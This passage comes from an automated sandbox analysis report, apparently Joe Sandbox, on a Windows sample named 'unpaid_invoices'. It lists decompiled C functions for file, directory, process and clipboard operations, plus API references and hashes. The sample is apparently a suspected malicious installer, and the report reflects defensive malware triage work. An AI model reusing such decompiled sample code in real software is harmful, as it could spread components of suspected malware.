					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





              0x0040613e
              0x00406144
              0x00406149
              0x00406152
              0x00406152
              0x0040615b

              APIs
              • GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
              • Instruction ID: 4d59290e3aa44cd58c99826dd52d8cee581d87a9a88888807f370448835cb7c6
              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
              • Instruction Fuzzy Hash: C2D0C972504130ABC2502728AE0889ABB55EB642717014A35F9A5A62B0CB304C628A98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405C1C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405C1C(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




              0x00405c22
              0x00405c2a
              0x00000000
              0x00405c30
              0x00000000

              APIs
              • CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
              • GetLastError.KERNEL32 ref: 00405C30
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CreateDirectoryErrorLast
              • String ID:
              • API String ID: 1375471231-0
              • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
              • Instruction ID: 9b4f5430b3bbe22f75525a6a8288bb62ac5ef9e6fdb3d88c50eeb6a92616e2bf
              • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
              • Instruction Fuzzy Hash: 1EC04C71218609AEE7705B209F0DB177A949B50741F11443A6686F40A0DA788455D92D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406210 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00406210(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





              0x00406214
              0x00406224
              0x0040622c
              0x00000000
              0x00406233
              0x00000000
              0x00406235

              APIs
              • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0078E665,0078B730,0040357F,0078B730,0078E665,/ky,00793730,00004000,?,00000000,004033A9), ref: 00406224
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: FileWrite
              • String ID:
              • API String ID: 3934441357-0
              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
              • Instruction ID: f08cceda346ec9350f11c22fcf513fe3bc01c5f1c17db0892cf19a12a1b56e8c
              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
              • Instruction Fuzzy Hash: 95E08C3220026AABCF10AE698C00AEB3B6CFB05360F01447AFE56E7040D334E83087A5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004061E1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004061E1(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





              0x004061e5
              0x004061f5
              0x004061fd
              0x00000000
              0x00406204
              0x00000000
              0x00406206

              APIs
              • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00793730,0078B730,004035FB,?,?,004034FF,00793730,00004000,?,00000000,004033A9), ref: 004061F5
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
              • Instruction ID: a9904075eeec40e7e939a2dde13f9046a7e38eb284923ea40542f090f2fca858
              • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
              • Instruction Fuzzy Hash: 66E08632500219ABDF106E519C04AEB375CFB01350F01487AFD22E2151E231E87187A8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004035FE Relevance: 1.5, APIs: 1, Instructions: 6COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004035FE(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




              0x0040360c
              0x00403612

              APIs
              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
              Download Yara Rule
              C-Code - Quality: 78%
              			E00401FA4() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056D0(0xffffffeb, _t7);
				_t9 = E00405C51(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE6(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065B5( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









              0x00401faa
              0x00401faf
              0x00401fb5
              0x00401fba
              0x00401fbe
              0x0040292e
              0x00401fc4
              0x00401fc7
              0x00401fca
              0x00401fd2
              0x00401fe1
              0x00401fe3
              0x00401fe3
              0x00401fd4
              0x00401fd8
              0x00401fd8
              0x00401fd2
              0x00401fea
              0x00401feb
              0x00401feb
              0x00402c2d
              0x00402c39

              APIs
                • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                • Part of subcall function 00405C51: CreateProcessW.KERNELBASE ref: 00405C7A
                • Part of subcall function 00405C51: CloseHandle.KERNEL32(?), ref: 00405C87
              • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401FEB
                • Part of subcall function 00406AE6: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
                • Part of subcall function 00406AE6: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
                • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
              • String ID:
              • API String ID: 2972824698-0
              • Opcode ID: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
              • Instruction ID: 2caf0deb9ca9c7db124b05ee4a2ba4d84aa6555efd1b03c2e112275a9e200b7a
              • Opcode Fuzzy Hash: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
              • Instruction Fuzzy Hash: FCF09671904111E7DB11BBA59A88E9E76A4DF01318F25443BE102B21D0D77C4D419A6E
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 0040580F Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
              Download Yara Rule
              C-Code - Quality: 95%
              			E0040580F(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x7a7a84;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004057A3, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066AB(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x7a1f88;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x7a7a6c == _t156) {
							ShowWindow( *0x7a8aa8, 8);
							if( *0x7a8b2c == _t156) {
								E004056D0( *((intOrPtr*)( *0x7a0f60 + 0x34)), _t156);
							}
							E004045A3(_t171);
							goto L25;
						}
						 *0x7a0758 = 2;
						E004045A3(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404631(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a7a70, _t156);
						ShowWindow(_t169, 8);
						E004045FF(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x7a8ab0;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x7a7a70 = GetDlgItem(_a4, 0x403);
				 *0x7a7a68 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x7a7a84 = _t134;
				_v8 = _t134;
				E004045FF( *0x7a7a70);
				 *0x7a7a74 = E00404F58(4);
				 *0x7a7a8c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045CA(_a4);
				if(( *0x7a8ab8 & 0x00000003) != 0) {
					ShowWindow( *0x7a7a70, _t156);
					if(( *0x7a8ab8 & 0x00000002) != 0) {
						 *0x7a7a70 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045FF( *0x7a7a68);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x7a8ab8 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































              0x00405817
              0x0040581d
              0x00405827
              0x0040582a
              0x004059c0
              0x004059e4
              0x004059e4
              0x004059f7
              0x00405a15
              0x00405a17
              0x00405a1f
              0x00405a75
              0x00405a79
              0x00000000
              0x00000000
              0x00405a7b
              0x00405a81
              0x00000000
              0x00000000
              0x00405a8b
              0x00405a93
              0x00405a96
              0x00405b98
              0x00000000
              0x00405b98
              0x00405aa5
              0x00405ab0
              0x00405ab9
              0x00405ac4
              0x00405ac7
              0x00405ad0
              0x00405ad6
              0x00405ad9
              0x00405ad9
              0x00405af1
              0x00405afa
              0x00405afd
              0x00405b04
              0x00405b0b
              0x00405b13
              0x00405b13
              0x00405b2a
              0x00405b2a
              0x00405b31
              0x00405b37
              0x00405b43
              0x00405b4a
              0x00405b53
              0x00405b55
              0x00405b58
              0x00405b67
              0x00405b6a
              0x00405b70
              0x00405b71
              0x00405b77
              0x00405b78
              0x00405b79
              0x00405b81
              0x00405b8c
              0x00405b92
              0x00405b92
              0x00000000
              0x00405af1
              0x00405a27
              0x00405a57
              0x00405a5f
              0x00405a6a
              0x00405a6a
              0x00405a70
              0x00000000
              0x00405a70
              0x00405a2b
              0x00405a35
              0x00000000
              0x004059f9
              0x004059ff
              0x00405a3a
              0x00000000
              0x00405a43
              0x00405a08
              0x00405a0d
              0x00405a10
              0x00000000
              0x00405a10
              0x004059f7
              0x00405830
              0x00405834
              0x0040583c
              0x00405840
              0x00405843
              0x00405846
              0x00405849
              0x0040584c
              0x0040584d
              0x0040584e
              0x00405867
              0x0040586a
              0x00405874
              0x00405883
              0x0040588b
              0x00405893
              0x00405898
              0x0040589b
              0x004058a7
              0x004058b0
              0x004058b9
              0x004058db
              0x004058e1
              0x004058f2
              0x004058f7
              0x00405905
              0x00405913
              0x00405913
              0x00405918
              0x00405926
              0x00405926
              0x0040592b
              0x0040592e
              0x00405933
              0x0040593f
              0x00405948
              0x00405955
              0x00405964
              0x00405957
              0x0040595c
              0x0040595c
              0x00405970
              0x00405970
              0x00405984
              0x0040598d
              0x00405996
              0x004059a6
              0x004059b2
              0x004059b2
              0x00000000

              APIs
              • GetDlgItem.USER32 ref: 0040586D
              • GetDlgItem.USER32 ref: 0040587C
              • GetClientRect.USER32 ref: 004058B9
              • GetSystemMetrics.USER32 ref: 004058C0
              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058E1
              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058F2
              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405905
              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405913
              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405926
              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405948
              • ShowWindow.USER32(?,00000008), ref: 0040595C
              • GetDlgItem.USER32 ref: 0040597D
              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040598D
              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A6
              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059B2
              • GetDlgItem.USER32 ref: 0040588B
                • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
              • GetDlgItem.USER32 ref: 004059CF
              • CreateThread.KERNEL32 ref: 004059DD
              • CloseHandle.KERNEL32(00000000), ref: 004059E4
              • ShowWindow.USER32(00000000), ref: 00405A08
              • ShowWindow.USER32(?,00000008), ref: 00405A0D
              • ShowWindow.USER32(00000008), ref: 00405A57
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A8B
              • CreatePopupMenu.USER32 ref: 00405A9C
              • AppendMenuW.USER32 ref: 00405AB0
              • GetWindowRect.USER32 ref: 00405AD0
              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE9
              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B21
              • OpenClipboard.USER32(00000000), ref: 00405B31
              • EmptyClipboard.USER32 ref: 00405B37
              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B43
              • GlobalLock.KERNEL32 ref: 00405B4D
              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B61
              • GlobalUnlock.KERNEL32(00000000), ref: 00405B81
              • SetClipboardData.USER32 ref: 00405B8C
              • CloseClipboard.USER32 ref: 00405B92
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
